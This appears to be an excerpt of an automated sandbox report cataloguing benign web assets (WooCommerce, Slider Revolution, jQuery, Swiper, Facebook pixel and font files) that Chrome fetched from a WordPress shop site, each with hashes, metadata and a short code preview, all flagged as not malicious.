                                                                                                          SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2142), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2142
                                                                                                          Entropy (8bit):4.808937135056841
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:JWff/T6h2gjT6h2yb5FTRtJylRrW61kRaM+C:JYf/T6h2qT6h2yb5FT/JylA6YavC
                                                                                                          MD5:01ECAEF76CE84F4EDA93C650894E32A0
                                                                                                          SHA1:A4554B59D40FB24E38F93F12BCF6C86693F6950A
                                                                                                          SHA-256:7302959A3FEAC84B8F4145D7D2EBE16F817336B8A965C55C394173BAF4AED68C
                                                                                                          SHA-512:01F208D95342EC6852E7C2F5602D3188F2C2062DDAA2EAA68D531C944FA6329C8D5C291701A2F5E62C56255EF23B546BAD65673D4A14DA47738FDDF26A8AAF53
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/frontend/price-slider.min.js?ver=6.6.1
                                                                                                          Preview:jQuery(function(_){return"undefined"!=typeof woocommerce_price_slider_params&&(_(document.body).on("price_slider_create price_slider_slide",function(e,r,i){_(".price_slider_amount span.from").html(accounting.formatMoney(r,{symbol:woocommerce_price_slider_params.currency_format_symbol,decimal:woocommerce_price_slider_params.currency_format_decimal_sep,thousand:woocommerce_price_slider_params.currency_format_thousand_sep,precision:woocommerce_price_slider_params.currency_format_num_decimals,format:woocommerce_price_slider_params.currency_format})),_(".price_slider_amount span.to").html(accounting.formatMoney(i,{symbol:woocommerce_price_slider_params.currency_format_symbol,decimal:woocommerce_price_slider_params.currency_format_decimal_sep,thousand:woocommerce_price_slider_params.currency_format_thousand_sep,precision:woocommerce_price_slider_params.currency_format_num_decimals,format:woocommerce_price_slider_params.currency_format})),_(document.body).trigger("price_slider_updated",[r,i])
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (64288)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):374124
                                                                                                          Entropy (8bit):5.38002327405143
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:KAcjJFAkBwH4N0CXH2QDwfGWWDTu4B8GBF93MvbQG32D2allxb:xCn0H4N2GWgB8GBF93Mv0DDpR
                                                                                                          MD5:4C40B91C5E5C8B2AA3A187D8A7FCC634
                                                                                                          SHA1:AA785BB3AD45F71A6C866C4895632B8FA6586E7B
                                                                                                          SHA-256:3DF5391E09EDBBA03D60DA8ED698C0E662DA73A86FCEAE2BFF79AB46ED6FBF6F
                                                                                                          SHA-512:1804A461A690E38156F178D05707EAD70F78A335EAE33677C5C653D5144FB6D220037E85637C8C581D1D00C28C0D23B27C53779949E4C8E8DC73A3AB1EEA7B7D
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.5.4
                                                                                                          Preview:/*!.. - Slider Revolution JavaScript Plugin -............................xXXXXX................................... xXXXXX..xXXXXX..xXXXXX............................xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX...................,xXXXXX..xXXXXX..xXXXXX..xXXXXX....................xXXXXX..xXXXXX..xXXXXX..xXXXXX...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx...............................xxxxxxxxxxxxxxxxxxx.............. DATE: 2021-07-01..@author: Krisztian Horvath, ThemePunch OHG...INTRODUCING GIT.UPDATES AND DOCS AT:.https://www.themepunch.com/support-center..GET LICENSE AT:.https://www.themepunch.com/links/sli
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 768 x 768, 8-bit colormap, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):285114
                                                                                                          Entropy (8bit):7.972341436872587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:AkhuY98l42J/RTWipHWAYJRKXIFlH6PsDXR1DAq0h+IJ:AtY9qdHWrJRK4Flm+1cFJ
                                                                                                          MD5:D7E3EEFEA4C22E58ACE761DCC18A91D5
                                                                                                          SHA1:7C1251F2CFCF32D08ACBADF8449C7512D64E0CDE
                                                                                                          SHA-256:A83E5AF2BA81F1463A67A7E244D78838D937883BAAA2C1EBD1E69AA2EABA4C69
                                                                                                          SHA-512:0F68477933113AE1450BB19ED86647B09CE8A2E02E661B0CED86200334327273620B876E20F613500E547EF7C4213AE379F5180AE7A8D603B0B88B318A641C8A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.............._.....pHYs..........+......PLTE............................................................................................................/'+......<28......C:AA6<.........-#'...G=E2+. ...........)."...&..#..JBIOFN...ZT`5/56+1QJU ..........WPZ)"%.....<.2......v._[ib_n........................PO]..z.;6>.}...!. .+3...P=Fy_m....{q.esjgv(%,..........ts.$ $bPX..tA>JUAJp\hiQ]WWg<)(plynVb......XMTYGNFDP3!!.r.........j|...5&()../...rj..wbZbJ:?<9D.l{52;JIViemzds~...q...{D21bJR.lfjm.{z.........G3;.wo...........|r..bcv....f^.......................rgS3,qw...`\...G,%.lb.....yYf..............XA?P:7...eF?...oJC....WQ..|`:3...........yOJ....~..sj.........sWS...="...........{tw.........................[S......................ws.................b^............K.J.....tRNS..........R-... .IDATx.[.n.H.5Y(.....2.h......w.....Y'.X.....I......~.......D.:1.hc.].V..!...G....{........{M.=S.+.*s.*...&;.U../w/....yY..:.?(..6..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):10721
                                                                                                          Entropy (8bit):3.5801354464202984
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BF/VV0a8iOc9oEC+GEC7oECu2l6okiuu4hGkitCNdOSvRqedcZfwLIAD2Vieyq:PEAoYGVo96o14hG8zcS2h
                                                                                                          MD5:5913A02287279FA0C9D4704655687CCB
                                                                                                          SHA1:3BC0A4E773150BCBEFAC9DE54DF5093F6ED28232
                                                                                                          SHA-256:F62B2B2019093248189FD8E25491B3F0DEBD49A802984C8E61505B89D533C70C
                                                                                                          SHA-512:0E3B343D1AD23A38AC96C5CF483D49766CC4D9C97B508843F13AA809859D77B1C75D00BAB551DBAF56A0CE0BFAAA7B4A311FD6DFA43272EDEC03496E87FF85AE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.5.4
                                                                                                          Preview:(function ($) {. /**. * refresh cart when payment method changed. */. if (awdr_params.refresh_order_review == '1') {. $(document).on('change', 'input[name="payment_method"],input[name="billing_city"],input[name="billing_postcode"]', function () {. refreshCart();. });.. /**. * refresh cart when Email changed. */. $(document).on('blur', 'input[name="billing_email"], select#billing_state', function () {. refreshCart();. });. }.. function refreshCart() {. $('body').trigger('update_checkout');. }.. $(document).ready(function ($) {. function init_events() {. if (awdr_params.enable_update_price_with_qty == 'show_dynamically') {. function getWDRDPTarget(form, target, is_variable){. let $price_place = '';. if (form.find(target).length) {. $price_place = form.find(target).first();.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2577)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2578
                                                                                                          Entropy (8bit):5.177015723485366
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mPTblyuvUkJipDUGr207o/9QZOF1JzOTPUzGbe2yhL4rXpDeiUkLTj7fWfPfpC7X:mPnlyuv/IpDUGr20KqZOFPOzUb2nrXpZ
                                                                                                          MD5:9BB8540493A7FE11B229870EB37BE165
                                                                                                          SHA1:D77F17CB9057DC8F622B8C0BF23F6ACB739B3B8E
                                                                                                          SHA-256:4A7EE62EB33F3BBB66C2151E5CAC6BF4904E28302EFC36128F3E3CCAE6FDE580
                                                                                                          SHA-512:FB245059108EE476BFBCA60A96D401C2796EE44B646E0874D41B5FDB1204A66E3BEC6A4AB8E155E50489B3ADF48BD609683B3D1C020B9F39D084A915F8377773
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:(function(a){window.ShareLink=function(b,c){var d,e={},f=function(a){var b=a.substr(0,e.classPrefixLength);return b===e.classPrefix?a.substr(e.classPrefixLength):null},g=function(a){d.on("click",function(){h(a)})},h=function(a){var b="";if(e.width&&e.height){var c=screen.width/2-e.width/2,d=screen.height/2-e.height/2;b="toolbar=0,status=0,width="+e.width+",height="+e.height+",top="+d+",left="+c}var f=ShareLink.getNetworkLink(a,e),g=/^https?:\/\//.test(f),h=g?"":"_self";open(f,h,b)},i=function(){a.each(b.classList,function(){var a=f(this);if(a)return g(a),!1})},j=function(){a.extend(e,ShareLink.defaultSettings,c),["title","text"].forEach(function(a){e[a]=e[a].replace("#","")}),e.classPrefixLength=e.classPrefix.length},k=function(){d=a(b)};(function(){j(),k(),i()})()},ShareLink.networkTemplates={twitter:"https://twitter.com/intent/tweet?text={text}\x20{url}",pinterest:"https://www.pinterest.com/pin/create/button/?url={url}&media={image}",facebook:"https://www.facebook.com/sharer.php?u={u
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (9139)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):9533
                                                                                                          Entropy (8bit):5.393453483611794
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:x9RHfGTArT7TMcPvRwY7A1uKigDDptgMIOP9+HxlP722DIrNrDc:x9RGTArf4cPqY7YhR9thIOPcRF72YsA
                                                                                                          MD5:87C54EDF7DAD7DFDFDE015F6EEE45FF1
                                                                                                          SHA1:96EC1A06EA3093C47E1E2FC4444ADA7F4456135D
                                                                                                          SHA-256:EF22199864042B8CEEEE3729F3254C140DF7217364045737CA3AADF8434FB3DA
                                                                                                          SHA-512:5C3565BB7C80CBEBEFFD3A0A413DF03FB264EF2D2B2F7CAEAAA29B828081F6DB95EF6FE5C1D64A988D5885DEA699A7E9D112393A745A445990008A99CCD5DE9F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.7.0-wc.6.6.1
                                                                                                          Preview:/*!. * jQuery blockUI plugin. * Version 2.70.0-2014.11.23. * Requires jQuery v1.7 or later. *. * Examples at: http://malsup.com/jquery/block/. * Copyright (c) 2007-2013 M. Alsup. * Dual licensed under the MIT and GPL licenses:. * http://www.opensource.org/licenses/mit-license.php. * http://www.gnu.org/licenses/gpl.html. *. * Thanks to Amir-Hossein Sobhi for some excellent contributions!. */.!function(){"use strict";function e(p){p.fn._fadeIn=p.fn.fadeIn;var b=p.noop||function(){},h=/MSIE/.test(navigator.userAgent),k=/MSIE 6.0/.test(navigator.userAgent)&&!/MSIE 8.0/.test(navigator.userAgent),y=(document.documentMode,"function"==typeof document.createElement("div").style.setExpression&&document.createElement("div").style.setExpression);p.blockUI=function(e){o(window,e)},p.unblockUI=function(e){v(window,e)},p.growlUI=function(e,t,o,n){var i=p('<div class="growlUI"></div>');e&&i.append("<h1>"+e+"</h1>"),t&&i.append("<h2>"+t+"</h2>"),o===undefined&&(o=3e3);var s=function(e){p.blockUI({messa
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1797
                                                                                                          Entropy (8bit):5.513180777092381
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Q5OLr1+A5OLr12FZOJ5OLr1wX5OLr1DJc+u15OLr1ykN0xD:Q5OLr1+A5OLr12FZOJ5OLr1G5OLr1DJy
                                                                                                          MD5:C1F1E3109AEDF666C1B722B484E0EA9E
                                                                                                          SHA1:270C502AF868D3AA47DBE1F52302CB4E50BEB8BC
                                                                                                          SHA-256:D3986C05A625102996B150697981E60528E805BF00679152CBFD800CAEB52CDE
                                                                                                          SHA-512:83FF171BB2BE2F7A4D5B88779F141DC107AA26B42F363CBB48C8E1FB6A414DBA9AE6ED578A30524EA97B9B39B759D277DA273EA15B38F35DC444C7673DD080CE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://fonts.googleapis.com/css?family=Mulish%3A400%7C-apple-system%2C+BlinkMacSystemFont%2C+%22Segoe+UI%22%2C+Roboto%2C+Oxygen-Sans%2C+Ubuntu%2C+Cantarell%2C+%22Helvetica+Neue%22%2C+sans-serif&subset=latin%2Clatin-ext
                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Mulish';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aqvG4w-.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Mulish';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aOvG4w-.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Mulish';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/mulish/v13/1Ptyg83HX_SGhgqO0yLcmjzUAuWexZNR8aivG4w-.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-fac
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1256
                                                                                                          Entropy (8bit):4.699585940208305
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:h5lqUBSydDF8yF9OyeDVjtokvMuTuSSi791GZs+Scirpvw7RSevMuW:h5ly6vOrDVh96SR7GXVRR9W
                                                                                                          MD5:9F98A7262163D20AEDC73AFBAC70DCEA
                                                                                                          SHA1:D8B963AB148CDA48ABB4D2D379BD72737C40E089
                                                                                                          SHA-256:093B42292C864BA77AA5523A73EC87D2690D387FFE7F721BD679860C45902727
                                                                                                          SHA-512:5386927FBCFAB47F049FEFCA6F278EA50503A79F79AAF1BC563C1C9F25B9ABA0AD10BDDAF598ACA1F831E9FE5EB358489F927DE20C1300F28A72A7F5B87BD49B
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/label/css/html_types/label.css?ver=3.3.0
                                                                                                          Preview:.woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked {. background-color: #34495e;. border-color: #34495e;.}....woof_list_label li {. display: inline-block !important;. margin: 2px;. vertical-align: top;.}...woof_list_label .woof_label_term.{. background-color: #efefef;. border: 1px solid #ddd;. margin: 3px 3px 3px 0;. padding: 3px 4px;. . line-height: 25px;. text-align: center;. overflow: hidden;. text-decoration: none;. cursor: pointer;.. min-width: 50px;. max-width: 100%;. height: 50px;. display: flex;. justify-content: center;. align-items: center;.}...woof_list_label li .woof_label_term:hover,..woof_list_label li .woof_label_term.checked.{. background-color: #477bff;. border-color: #477bff;. color: #fff;.}...woof_label_count{. font-size: 10px;. position: absolute;. border-radius: 200px;. min-width: 17px;. height: 17px;. line-height: 17px !important;. color
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1665
                                                                                                          Entropy (8bit):4.2829135862996495
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:RMdI2FGs1r+7OGsrq+XEXRGsF7OgkGsLKOCu:edzFGMr+7OGSq+0hGs7ONGCKOCu
                                                                                                          MD5:0B3F95A864BCF6A1F4215D5405CB252C
                                                                                                          SHA1:2014EA5BA49313BC63BD2311A283FB7BB2E93013
                                                                                                          SHA-256:207D9044E5B72E312D09A6004BF10170FE47E38503CC39F5DA517571DEB4B6E9
                                                                                                          SHA-512:DF3466D866A8407A286F4CFC70C7A314F69C9A3DF0E40207B638A9C3CCB38C58670589F03298CA0844B9A8B26FFD80C144FB5267E106A2F2261297827BEC5684
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:"use strict";..function woof_init_featured() {.. if (icheck_skin != 'none') {.. jQuery('.woof_checkbox_featured').iCheck({. checkboxClass: 'icheckbox_' + icheck_skin.skin + '-' + icheck_skin.color,. });.. jQuery('.woof_checkbox_featured').on('ifChecked', function (event) {. jQuery(this).attr("checked", true);. woof_current_values.product_visibility = 'featured';. woof_ajax_page_num = 1;. if (woof_autosubmit) {. woof_submit_link(woof_get_submit_link());. }. });.. jQuery('.woof_checkbox_featured').on('ifUnchecked', function (event) {. jQuery(this).attr("checked", false);. delete woof_current_values.product_visibility;. woof_ajax_page_num = 1;. if (woof_autosubmit) {. woof_submit_link(woof_get_submit_link());. }. });.. } else {. jQuery('.woof_checkbox_featured').on('change', function (e
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65280)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):139153
                                                                                                          Entropy (8bit):5.2146927200642335
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:Fj2qhgxfeuGMfoqi2ZLjK8ieVlLXCiiSsWRLK7A3dnaKBjY4vHgZsUOUTqiqpBgA:wxoo6desFshaKi+HgZsUOUTqiqM37ER
                                                                                                          MD5:15BB2B8491FC7E84137D65F610E1685A
                                                                                                          SHA1:CD76B70A5426893E9C022B9A75C50A7C1348E2D0
                                                                                                          SHA-256:B23F49F504FAA32AAC548B6662FFD64412F6738496FAB8BE38DA46C5B7121804
                                                                                                          SHA-512:95C05110B29101C84DF71C54172269F478D9CD14965B3DE987613E11E0F1CCF01C1B7D2BF290D97EF11373F24DCCD677F8710E1555D332903181F469D0F2B0BB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/**. * Swiper 5.3.6. * Most modern mobile touch slider and framework with hardware accelerated transitions. * http://swiperjs.com. *. * Copyright 2014-2020 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: February 29, 2020. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e=e||self).Swiper=t()}(this,(function(){"use strict";var e="undefined"==typeof document?{body:{},addEventListener:function(){},removeEventListener:function(){},activeElement:{blur:function(){},nodeName:""},querySelector:function(){return null},querySelectorAll:function(){return[]},getElementById:function(){return null},createEvent:function(){return{initEvent:function(){}}},createElement:function(){return{children:[],childNodes:[],style:{},setAttribute:function(){},getElementsByTagName:function(){return[]}}},location:{hash:""}}:document,t="undefined"==typeof window?{document:e,navigator:{userAgent:""},
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):4.508263568166706
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:l4GiM0XwHRp8Y3:jiM/+Y3
                                                                                                          MD5:42ADACE676F5AABC801213B68DD2F459
                                                                                                          SHA1:79676A1B58DDFBDC18EDED38B5FD608B4AA9A81F
                                                                                                          SHA-256:C277FE3B68AD507BA99939F981BAAC6ADE7850FABDAAFF0ACE5334C5A8268700
                                                                                                          SHA-512:41754E6D9D8A5EA882C22BDA32C9F717433F2ECA7DCC09C9FC50F4EB096A1221202C7DCBE0927D792AB93BB74BE172F19EC932B8DFE085A6F39F493DE8BF4BDB
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/ext/by_featured/css/by_featured.css?ver=3.3.0
                                                                                                          Preview:.woof_checkbox_instock_container{. margin-bottom: 4px;.}..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 1026 x 660, 8-bit colormap, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):336687
                                                                                                          Entropy (8bit):7.9371821202017
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:1dA1RXS9wVXD6NETJlOHgP7Yw1ltE5SIALEf1nOrt1Q6dzx5ic6q:1qPXmwOn47YHBAkOro6lx5iG
                                                                                                          MD5:9F132C14B2459786AE408925E2D69971
                                                                                                          SHA1:91C9D644293E9E0FC4FA58AD1C6B14F942A468D0
                                                                                                          SHA-256:FD2690B49719B6AD474EEF9B3AD4138CE6EAB5DB3DAD584696A3893217D1FFCA
                                                                                                          SHA-512:B53A1AF676819FFD6713001BFC620E32CB235275C7CD5D1C1711EEE1D638555C92427BBFCB6EE178B72192B9AB9BEDAA344863C9CA1041EC93D10C6570AD71A3
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR...............j.....iTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Progetto senza titolo - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2024-09-04</Attrib:Created>. <Attrib:ExtId>084c4f8e-910b-4d8c-a0ab-d8b9c35096cf</Attrib:ExtId>. <Attrib:FbId>525265914179580</Attrib:FbId>. <Attrib:TouchType>2</Attrib:TouchType>. </rdf:li>. </rdf:Seq>. </Attrib:Ads>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:pdf='http://ns.ad
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (5552)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):72593
                                                                                                          Entropy (8bit):5.332700741129292
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:RJeUwT7hpwPCHM9ZVK01QYTZ02LKVsdmpyKdcicIF:RIT7Vs9ZVKBYj8wKdcHIF
                                                                                                          MD5:AAA706A00E7F15E53E03D39B4045A294
                                                                                                          SHA1:A4EE1013A0308037E0DEE7466ECD0F47301FA6C9
                                                                                                          SHA-256:1DB36C3CA34D615BBA7204EB6293655D4A1BE76BC6072D10A43EFA2F56E3CA58
                                                                                                          SHA-512:AB808E2BFDFF8871955B9944CD3A702DCCF7235C9944D89CED05A8E6132A0511505312D43C0BE0B1577E8BFA923D2985EEAFA41D8828533A73364A4944E1C652
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://connect.facebook.net/signals/config/157851312877398?v=2.9.178&r=stable&domain=annavirgili.com&hme=28abfdc7e582ae2a8fdd6ac5ebb406923cf601dc2ee488049b0628e75e0f6b36&ex_m=70%2C122%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C173%2C176%2C188%2C184%2C185%2C187%2C29%2C101%2C53%2C77%2C186%2C168%2C171%2C181%2C182%2C189%2C132%2C41%2C191%2C192%2C34%2C144%2C15%2C50%2C197%2C196%2C134%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C169%2C172%2C141%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                          Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (54731)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):54732
                                                                                                          Entropy (8bit):4.916853642347119
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:WkZDi+30UBgDjvwG1ZAIkKDJ3bys5XrHeI0RTq:WkZAwG1ZAIkKDJ3bys5XrHeI0RTq
                                                                                                          MD5:E694437A73EF9A97F833B891BB7A7D9D
                                                                                                          SHA1:23F250FBB82C13A399EC704B218BD857A31A76B0
                                                                                                          SHA-256:F18AEA69A9776B93A0FB73FEC35395A122B5DEEBF698911E8E5FE0BA759F3C1A
                                                                                                          SHA-512:E4DE364B6F11C2302EC15F0F7A144BE9E844206BABBEF090C26EC0960369134CB8A1525BE170B18F0B16B56184457B94EC55A0D98167442476E69C3AE27858CE
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/enjoy-instagram-instagram-responsive-images-gallery-and-carousel/assets/css/animate.min.css?ver=6.2.2
                                                                                                          Preview:@charset "UTF-8";.animated{-webkit-animation-duration:1s;animation-duration:1s;-webkit-animation-fill-mode:both;animation-fill-mode:both}.animated.infinite{-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite}.animated.hinge{-webkit-animation-duration:2s;animation-duration:2s}@-webkit-keyframes bounce{0%,20%,50%,80%,100%{-webkit-transform:translateY(0);transform:translateY(0)}40%{-webkit-transform:translateY(-30px);transform:translateY(-30px)}60%{-webkit-transform:translateY(-15px);transform:translateY(-15px)}}@keyframes bounce{0%,20%,50%,80%,100%{-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}40%{-webkit-transform:translateY(-30px);-ms-transform:translateY(-30px);transform:translateY(-30px)}60%{-webkit-transform:translateY(-15px);-ms-transform:translateY(-15px);transform:translateY(-15px)}}.bounce{-webkit-animation-name:bounce;animation-name:bounce}@-webkit-keyframes flash{0%,50%,100%{opacity:1}25%,75%{opacity:0}}@keyframes
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 768 x 768, 8-bit colormap, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):257674
                                                                                                          Entropy (8bit):7.968231333512948
                                                                                                          Encrypted:false
